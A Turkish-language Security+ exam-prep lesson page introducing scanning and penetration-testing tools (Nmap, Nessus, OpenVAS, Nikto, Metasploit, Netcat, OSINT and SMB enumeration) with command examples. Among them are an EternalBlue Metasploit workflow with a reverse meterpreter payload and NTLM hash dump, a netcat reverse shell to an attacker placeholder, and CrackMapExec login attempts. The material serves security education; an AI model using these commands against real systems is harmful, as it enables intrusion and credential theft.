0Pricing
Cloud & IT Cert Prep · Ders

Yaygın Tarama Araçları: Nessus, OpenVAS, Nmap

Ana bilgisayar keşfi, bağlantı noktası taraması ve güvenlik açığı belirleme için sektörde standart hâline gelmiş araçları uygulamalı olarak tanıyın.

Yaygın Tarama Araçları: Nessus, OpenVAS, Nmap, CoddyKit'te ücretsiz bir Cloud & IT Cert Prep dersidir. Bu, 4 dersinin 2. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cloud & IT Cert Prep öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cloud & IT Cert Prep kursu toplamda 4 dersten oluşur.

Tarama Aracı Ekosistemi

Güvenlik uzmanları farklı amaçlar için çeşitli tarama araçları kullanır: ana bilgisayar keşfi, bağlantı noktası taraması, hizmet numaralandırması, işletim sistemi algılama, güvenlik açığı belirleme ve web uygulaması testi. Security+ her kategoride en yaygın kullanılan araçlara aşina olmanızı bekler. Her aracın ne yaptığını ve ne yapamayacağını anlamak, belirli bir görev için doğru aracı seçmenize ve sonuçları doğru yorumlamanıza yardımcı olur. Birden fazla tamamlayıcı araçtan elde edilen sonuçlar, tek bir aracın sağlayabileceğinden daha eksiksiz kapsam sunar.

Nmap: Ağ Eşleyici

Nmap (Network Mapper), ağ keşfi ve güvenlik denetimi için en yaygın kullanılan açık kaynaklı araçtır. Etkin ana bilgisayarları keşfedebilir, açık bağlantı noktalarını numaralandırabilir, çalışan hizmetleri ve bunların sürümlerini algılayabilir ve işletim sistemini belirleyebilir. Nmap, SYN scan (varsayılan, hızlı ve görece gizli), TCP Connect (tam el sıkışma gerçekleştirir; daha gürültülüdür ancak kök yetkisi gerektirmez), UDP scan ve version scan gibi çeşitli tarama teknikleri kullanır. Nmap, güvenlik açığı algılama, kaba kuvvet ve istismar için yüzlerce betik sağlayan Nmap Scripting Engine (NSE) ile birlikte gelir.

# Common Nmap scan types:
nmap -sS 192.168.1.0/24          # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10            # TCP connect scan
nmap -sU -p 53,67,161 target     # UDP scan specific ports
nmap -sV 192.168.1.10            # version detection
nmap -O 192.168.1.10             # OS detection
nmap -A 192.168.1.10             # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10            # scan all 65535 ports
nmap --script vuln 192.168.1.10  # run vulnerability scripts

Nmap Çıktısı ve Yorumlanması

Nmap çıktısını doğru yorumlamak temel bir beceridir. Her satır, durumu (open: hizmet dinliyor, closed: ana bilgisayar yanıt verdi ancak hiçbir hizmet dinlemiyor, filtered: yanıt yok veya ICMP erişilemez; büyük olasılıkla güvenlik duvarı tarafından engellenmiş), protokolü ve algılanan hizmeti/sürümüyle birlikte bir bağlantı noktasını temsil eder. Açık bağlantı noktaları olası saldırı yüzeyini temsil eder. Bir ana bilgisayardaki beklenmeyen açık bağlantı noktaları, güvenlik ihlaline veya yetkisiz hizmetlere işaret edebilir. -oN, -oX ve -oG seçenekleri çıktıyı normal, XML ve grep ile işlenebilir biçimlerde kaydeder; çıktıyı kaydetmek, belgeler ve zaman içindeki taramalar arasında karşılaştırma yapmak için kritik öneme sahiptir.

# Sample Nmap output:
# PORT     STATE SERVICE  VERSION
# 22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu
# 80/tcp   open  http     Apache 2.4.41
# 443/tcp  open  ssl/http Apache 2.4.41
# 8080/tcp open  http     Jetty 9.4.39
# 3306/tcp open  mysql    MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)

# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xml

Nessus: Kurumsal Güvenlik Açığı Tarayıcısı

Nessus (Tenable tarafından), en yaygın kullanılan ticari güvenlik açığı tarayıcısıdır. CVE'leri, yapılandırma denetimlerini, uyumluluk ölçütlerini (CIS, DISA STIG) ve kötü amaçlı yazılım algılamayı kapsayan 100.000'den fazla eklenti içeren bir eklenti mimarisi kullanır. Nessus, sağlanan kimlik bilgileriyle sistemlere giriş yaparak yüklü yazılım sürümlerini, kayıt defteri anahtarlarını ve yapılandırma dosyalarını inceleyen kimlik bilgileriyle taramalar gerçekleştirir; bu taramalar, kimlik bilgisi kullanılmadan yapılan ağ yoklamalarına göre çok daha doğru sonuçlar üretir. Nessus, CVSS puanları, güvenlik açığı açıklamaları ve düzeltme önerileri içeren ayrıntılı raporlar oluşturur. Ücretsiz Nessus Essentials sürümü en fazla 16 IP tarar.

# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)

# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High     (CVSS 7.0-8.9):  privilege escalation, severe data exposure
# Medium   (CVSS 4.0-6.9):  local privilege escalation, information disclosure
# Low      (CVSS 0.1-3.9):  minimal impact, hardening issues
# Info:    configuration data, no immediate risk

OpenVAS: Açık Kaynaklı Güvenlik Açığı Taraması

OpenVAS (Open Vulnerability Assessment System), Greenbone Networks tarafından sürdürülen ücretsiz ve açık kaynaklı bir güvenlik açığı tarayıcısıdır. Ticari hâle gelmeden önceki özgün Nessus'un topluluk tarafından desteklenen çatallanmış sürümüdür. OpenVAS, Nessus eklentilerine benzer NVT'ler (Network Vulnerability Tests) kullanır. Greenbone Community Edition (GCE), web tabanlı bir yönetim arayüzü (Greenbone Security Assistant) sağlar. OpenVAS, lisans maliyetlerinin ticari araçların kullanımını engellediği ortamlarda popülerdir. Ücretsiz kalırken Nmap'ten daha geniş bir özellik kümesine sahiptir; bu nedenle küçük kuruluşlar, akademik ortamlar ve güvenlik laboratuvarları için yaygın bir tercihtir.

# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup    # initial setup (takes time to download feeds)
gvm-start    # start OpenVAS services

# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report

# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."

Nikto: Web Sunucusu Güvenlik Açığı Tarayıcısı

Nikto, tehlikeli dosyaları, güncel olmayan yazılım sürümlerini, sunucu yapılandırma sorunlarını ve yaygın web güvenlik açıklarını denetleyen açık kaynaklı bir web sunucusu tarayıcısıdır. Güvenli olmayan HTTP yöntemleri, eksik güvenlik üstbilgileri, açığa çıkmış yönetici arayüzleri, varsayılan kimlik bilgileri ve yaygın CGI güvenlik açıkları dâhil 6.700'den fazla bilinen sorunu test eder. Nikto gürültülüdür ve gizli çalışmak üzere tasarlanmamıştır; hedefte önemli miktarda günlük oluşturur. Nessus ve OpenVAS'ın derinlemesine kapsamayabileceği web'e özgü denetimler sağlayarak ağ düzeyi tarayıcıları tamamlar. Nikto'yu yalnızca test etme yetkiniz olan sistemlerde kullanın.

# Nikto web scan examples:
nikto -h 192.168.1.10                    # basic scan
nikto -h https://192.168.1.10            # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443      # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html  # save report

# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)

Metasploit Framework

Metasploit Framework, istismarlar, yükler, yardımcı modüller ve istismar sonrası araçlardan oluşan bir veritabanı sağlayan, en yaygın kullanılan sızma testi platformudur. Security+ adayları, daha önce kullanmamış olsalar bile Metasploit'in ne olduğunu ve bir sızma testindeki yerini anlamalıdır. Metasploit modülleri şunları içerir: istismarlar (bir güvenlik açığından yararlanan kod), yükler (başarılı istismardan sonra çalışan, Meterpreter gibi kabuk kodu), yardımcı modüller (istismar gerçekleştirmeden tarama, bulanıklaştırma ve numaralandırma) ve istismar sonrası modüller (ilk erişimden sonra ayrıcalık yükseltme, kimlik bilgisi dökümü ve yatay hareket için).

# Metasploit Framework basic workflow:
msfconsole                          # start Metasploit
search eternalblue                  # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info                               # show exploit details
set RHOSTS 192.168.1.10            # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5              # attacker IP
run                                # execute exploit

# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump              # dump NTLM hashes

Netcat: İsviçre Çakısı

Netcat (nc), TCP veya UDP kullanarak ağ bağlantıları üzerinden veri okuyan ve yazan basit ama çok yönlü bir yardımcı programdır. Güvenlik çalışmalarında sayısız kullanım alanı vardır: güvenliği ihlal edilmiş ana makinelerden reverse shell oluşturmak, ağ bölümleri arasında dosya aktarmak, port taraması yapmak, test amacıyla basit ağ dinleyicileri oluşturmak ve hizmet sürümlerini belirlemek için banner bilgilerini almak. Basit olması ve neredeyse her Linux sisteminde bulunması, onu hem meşru yönetim işlemlerinde hem de Attacker araç setlerinde sık kullanılan bir araç hâline getirir. Bu nedenle Netcat, tespit perspektifinden de anlaşılması gereken önemli bir araçtır.

# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22    # grab SSH banner
nc -v 192.168.1.10 80    # grab HTTP banner

# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded

# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash

# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender:   nc receiver_ip 9999 < file.txt

Recon-ng ve OSINT Araçları

Recon-ng, OSINT (Açık Kaynak İstihbaratı) toplamak için tasarlanmış bir Web keşif çatısıdır. Hedef hakkında herhangi bir etkin tarama başlamadan önce bilgi toplamak için Shodan, Bing, HaveIBeenPwned, DNS kayıtları, LinkedIn, WHOIS ve certificate transparency logs gibi herkese açık kaynakları sorgulayan modüller kullanır. Bir sızma testinin keşif aşaması genellikle hedefin ağ topolojisi, çalışan adları, e-posta biçimleri, kullanılan teknolojiler ve herkese açık varlıkları hakkında bir görünüm oluşturmak için OSINT ile başlar. İyi bir OSINT çalışması, yalnızca etkin taramayla bulunması çok daha uzun sürecek saldırı yollarını ortaya çıkarabilir.

# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com

# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com

# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'

# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin

# 5. Certificate transparency:
crt.sh/?q=%.example.com  (reveals subdomains via certs)

Enum4linux ile Ağ Enumeration

Enum4linux, null oturumlar ve MSRPC kullanarak Windows ana makinelerinden ve Samba (Linux SMB) sunucularından bilgi toplar. Kullanıcı adlarını, grup üyeliklerini, paylaşımları, parola ilkelerini ve çalışma grubu bilgilerini çıkarır. İç sızma testleri sırasında enum4linux, parola püskürtme için kullanılabilecek kullanıcı hesaplarını ve bir ortamın paylaşım yapısını hızla ortaya çıkarabilir. Modern Windows sürümleri null oturum erişimini varsayılan olarak kısıtlar; ancak kötü yapılandırılmış ortamlar çoğu zaman önemli miktarda bilgi açığa çıkarır. Kimliği doğrulanmış Enumeration için Impacket içindeki samrdump.py ve CrackMapExec de benzer özellikler sunar.

# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10       # all enumeration
enum4linux -U 192.168.1.10       # users only
enum4linux -S 192.168.1.10       # shares only

# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares

# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10

İş İçin Doğru Aracı Seçme

Güvenlik uzmanları araçları görevlere göre seçer. ana makine keşfi ve port taraması için: Nmap. Büyük ölçekte zafiyet belirleme için: Nessus (ticari) veya OpenVAS (ücretsiz). Web sunucusu zafiyetleri için: Nikto. Web uygulaması saldırıları için: Burp Suite. Exploitation için: Metasploit. OSINT keşfi için: Recon-ng, theHarvester, Shodan. ağ trafiği analizi için: Wireshark, tcpdump. kablosuz saldırılar için: Aircrack-ng paketi. Security+ sınavı bu araçlar hakkındaki kavramsal bilgiyi ölçer — her biriyle uygulamalı deneyiminiz olmasa bile hangi aracın ne amaçla kullanıldığını bilmelisiniz.

Kısa Kontrol

Bu dersteki CompTIA Security+ (SY0-701) kavramlarını anlayıp anlamadığınızı test edin.

Ders Özeti

Bu derste şunları öğrendiniz: Nmap, ek özellikler için zengin bir betik motoruyla ana makine keşfi, port taraması ve sürüm belirlemenin temelini oluşturur; Nessus ve OpenVAS, en yüksek doğruluk için kimlik bilgileriyle erişim kullanarak bilinen CVE'lere karşı kapsamlı zafiyet taraması yapar; Metasploit ise sızma testi uzmanlarının zafiyetlerin gerçekten kullanılabilir olduğunu doğrulamasını ve gerçek saldırı etkisini göstermesini sağlayan bir Exploitation çatısı sunar. Sırada Reconnaissance aşamasından Reporting aşamasına kadar tüm sızma testi yaşam döngüsünü inceleyeceğiz.

Sıkça Sorulan Sorular

“Yaygın Tarama Araçları: Nessus, OpenVAS, Nmap” dersi ücretsiz mi?

Evet — “Yaygın Tarama Araçları: Nessus, OpenVAS, Nmap” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cloud & IT Cert Prep kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cloud & IT Cert Prep kursu toplamda 4 dersten oluşur.

“Yaygın Tarama Araçları: Nessus, OpenVAS, Nmap” dersinde ne öğreneceğim?

Ana bilgisayar keşfi, bağlantı noktası taraması ve güvenlik açığı belirleme için sektörde standart hâline gelmiş araçları uygulamalı olarak tanıyın. Cloud & IT Cert Prep ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cloud & IT Cert Prep öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cloud & IT Cert Prep, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 2. dersidir.

“Yaygın Tarama Araçları: Nessus, OpenVAS, Nmap” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cloud & IT Cert Prep dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cloud & IT Cert Prep dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Güvenlik Açığı Taraması ve Sızma Testi
  2. Yaygın Tarama Araçları: Nessus, OpenVAS, Nmap
  3. Sızma Testi Aşamaları: Keşiften Raporlamaya
  4. CVSS Puanlaması ve Güvenlik Açıklarına Öncelik Verme
← Cloud & IT Cert Prep Sayfasına Dön